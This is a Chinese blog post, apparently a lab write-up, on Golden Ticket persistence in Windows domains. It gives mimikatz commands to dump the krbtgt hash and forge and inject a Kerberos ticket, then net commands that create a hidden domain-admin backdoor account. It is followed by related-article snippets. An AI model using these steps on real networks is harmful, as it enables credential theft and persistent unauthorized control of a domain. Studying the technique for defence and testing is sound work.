权限维持-黄金票据

最新推荐文章于 2024-01-17 14:35:02 发布
最新推荐文章于 2024-01-17 14:35:02 发布
阅读量243 收藏 2
点赞数 2
分类专栏: 内网 文章标签: 经验分享 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_64815693/article/details/130933993
版权

前言

黄金票据就是利用了Kerberos认证协议的一个特性,允许攻击者创建一个具有任意权限的伪造票据(Kerberos票据)。

他是基于Kerberos协议中的一个关键组件:票据授权票(TGT)。黄金票据就是首先窃取Kerberos密钥分发中心(KDC)的密钥(称为KRBTGT),然后使用密钥创建伪造的TGT,然后就可以访问域控。
注:限定域环境

复现

1.收集信息

前提条件:1.已经获得域控管理员权限

                  2.获取krbtgt的hash

这里假设我们已经上线了一台域内普通用户主机和域控主机。

 

 首先使用上线的域控主机执行下面其中一条命令,我们获得sid前面的内容,就是下面红框标出来的内容。

//获取自己的sid值,下面都可以
shell whoami /user
shell whoami /all
shell wmic useraccount get name,sid

然后是获得krbtgt的密码hash值

mimikatz privilege::debug
mimikatz lsadump::lsa /patch

2.生成黄金票据

东西都收集好了,这里我们来到域内主机的交互界面,这里首先我们可以看到这个域内主机是访问不了域控的

 

//user的值、sid值、krbtgt值都要修改成自己需要或者收集到的
mimikatz kerberos::golden /user:webadmin /domain:god.org /sid:S-1-5-21-1218902331-2157346161-1782232778 /krbtgt:b097d7ed97495408e1537f706c357fc5 /ticket:g

//清除原来的票据
mimikatz kerberos::purge

//导入生成的票据
mimikatz kerberos::ptt g

 这里我们可以看到可以查看域控目录了

 我们之后可以进行操作,比如生成一个影子域管理员用户

shell net user test$ 123Adf.. /add /domain
shell net group "domain admins" test$ /add /domain
练习两年半的篮球选..哦不对安全选手
关注
  • 2
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
黄金票据维持域控权限
weixin_49196285的博客
12-07 908
黄金票据维持域控权限 实验环境:windows2012域控、windows2012域内主机 实验要求:利用黄金票据维持域控权限 详细步骤: 1.首先搭建相关的域环境 a:设置服务器 b:更改计算机名称 C.安装域控制器和DNS服务 设置完成以后的安装页面如下: d:之后升级服务器并且添加相关的域名,配置完成以后可以在如下页面看到: e:之后把WIN7添加到域控之中,成为域控成员。最后添加用户成功并且最后发现域控搭建成功,登录页面如下: 2.
内网安全-权限维持-黄金白银票据维持&基于登录进程劫持-Skeleton Key&SID history&DSRM&SSP权限维持
weixin_45701675的博客
04-25 779
内网安全权限维持
权限维持-域渗透攻击-Golden Ticket (黄金票据)
weixin_43227251的博客
04-13 1609
Golden Ticket (黄金票据) 简义 : 在拥有普通域用户权限krbtgt账号的hash的情况下,获取域管理员权限。 发生在上面的过程3,可以伪造TGT(前提是获取krbtgt账号的口令散列值(hash)),宣称自己是域内任何账号,包括域管或者不存在的用户。 1. 首先,黄金票据是全功能的TGT。也就意味着万能票据可用于Kerberos认证的任何服务。票据授予服务盲目地相信TGT中的信息,然后处理TGT并颁发服务票据。 内存中插入黄金票据并不需要提升权限。而且默认情况下,黄金票据的有效期是10
权限维持——黄金票据和白金票据
cxrpty的博客
04-03 1979
获得域控得用户密码时,为了防止密码被改,需要进行权限维持 实验一:黄金票据 实验原理:ms14068的漏洞原理是伪造域管的tgt,而黄金票据的漏洞原理是伪造krbtgt用户的票据krbtgt用户是域控中用来管理发放票据的用户,拥有了该用户的权限,就可以伪造系统中的任意用户 实验条件: 1.域名称 2.域的SID 值 3.域的KRBTGT账户NTLM密码哈希或者aes-256值 4.伪造...
易语言-通用票据打印软件
06-25
通用票据打印软件源码,可以打印顺丰,韵达等快递单子。
打印机驱动 爱普生Epson LQ-630K 票据打印机驱动
05-26
打印机驱动 爱普生Epson LQ-630K 票据打印机驱动打印机驱动 爱普生Epson LQ-630K 票据打印机驱动打印机驱动 爱普生Epson LQ-630K 票据打印机驱动打印机驱动 爱普生Epson LQ-630K 票据打印机驱动打印机驱动 爱普生...
海岸线LQ-630K票据打印机驱动
07-09
海岸线lq 630k驱动是同型号票据打印机的驱动程序,支持主流操作系统,一键快速安装绝对方便,需要的赶紧下载吧。安装教程海岸线LQ-630K打印机驱动安装前请检查打印机是否已经连接。内附PDF版操作说明书,用于Windows...
ZC-应收票据.zip
01-06
ZC-应收票据.zip
FC-应付票据.zip
01-06
FC-应付票据.zip
权限维持(黄金票据与白银票据)
qq_18811919的博客
03-19 1890
黄金票据和白银票据通常被认为属于票据传递攻击(Pass-the-Ticket,简称PTT)的一种。 这是一种针对Windows身份验证系统的攻击,攻击者可以利用缺陷或弱点获取用户或系统 帐户的票据信息,然后将其用于进一步攻击或访问敏感资源本篇文章注意讲述了黄金票据 与白银票据的数据包分析以及如何进行PTT攻击,讲述了多种利用方式包括CS/mimikatz/Impacket等。
权限维持-黄金/白银票据详解
good good study
04-19 1966
在域环境中进行权限维持,谈的比较多的便是票据,分为白银票据黄金票据, 其原理都是基于Kerberos认证。黄金票据伪造的是域管下发给用户的TGT,而白银票据则是伪造的 ST。
利用黄金票据获取域控权限
qq_54713392的博客
06-30 463
利用黄金票据获取域控权限 (1)在域控服务器上用mimikatz获取krbtgt的sid和ntlm 提权执行命令:privilege::debug 获取用户krbtgt的信息执行命令lsadump::dcsync /domain:demo.com /user:krbtgt (2)获取krbtgt的sid和ntlm(这里尤其注意要去掉502) sid S-1-5-21-2189589203-2536092258-2850724310-502 ntlm c68811b401358f8d153cdb752e2
域内横向渗透-PTT票据传递之黄金票据 (Golden Ticket)
m0_62783065的博客
09-22 497
PTT票据传递之黄金票据 (Golden Ticket),介绍黄金票据的原理及其使用方法
内网渗透--Golden Ticket(黄金票据)制作&利用
最新发布
qq_62169455的博客
01-17 1204
伪造TGT,不需要和KDC进行校验,金票可以直接在本地生成,在域内机器和非域内机器都可以使用。
【域权限维持】-黄金票据
qq_41617902的博客
11-07 1258
Windows域权限维持-黄金票据
内网渗透备忘录
莫慌的博客
09-30 665
内网渗透常用命令备忘
一文了解黄金票据和白银票据
闵行小鱼塘
05-13 9871
某老哥的一次面试里问到了这个问题,故来做一番了解:该攻击方式在BlackHat 2014被提出,演讲者为Alva Duckwall & Benjamin Delpy(@gentilkiwi)进行了演示,该演讲提出了Kerberos协议实现过程中的设计逻辑缺陷,也就是说Windows所有使用Kerberos的场景中都可以进行此类攻击
AD域渗透 黄金与白银票据攻击
m0_57221101的博客
04-12 757
过两天研究明白kerberos协议里每次发包中各个参数的含义之后,会发一个协议的详细解析,也许能帮助大家比较详细的理解这套协议。敬请期待 以下演示环境借用红日团队vulnstack2域环境,感谢 工具 gentilkiwi/mimikatz: A little tool to play with Windows security (github.com) 也可以使用kali中帮你预编译好的,直接输入mimikatz就会告诉你在哪 黄金票据 原理 黄金票据攻击发生在我们知道域中的tgt验证用户k
内网中黄金票据和白银票据的区别
05-14
在内网中,黄金票据和白银票据通常是指两种不同的身份验证方式。 黄金票据是指一个用于身份验证的加密令牌,它被称为黄金是因为它具有最高的权限级别。黄金票据可以让用户在网络中获得管理员级别的访问权限,因此它的使用应该被高度限制并受到严格的监管。 白银票据则是一个用于身份验证的较低级别的加密令牌。它通常被用于授权用户在网络中执行一些普通的任务,例如打印文件或者访问共享文件夹。白银票据通常具有比黄金票据更低的访问权限,因此它的使用范围更广,可以被更多的用户所使用。 总的来说,黄金票据和白银票据都是用于身份验证的加密令牌,它们的主要区别在于权限级别的高低。在内网中,这些票据的使用应该受到高度的限制和监管,以确保网络的安全性。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

练习两年半的篮球选..哦不对安全选手

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值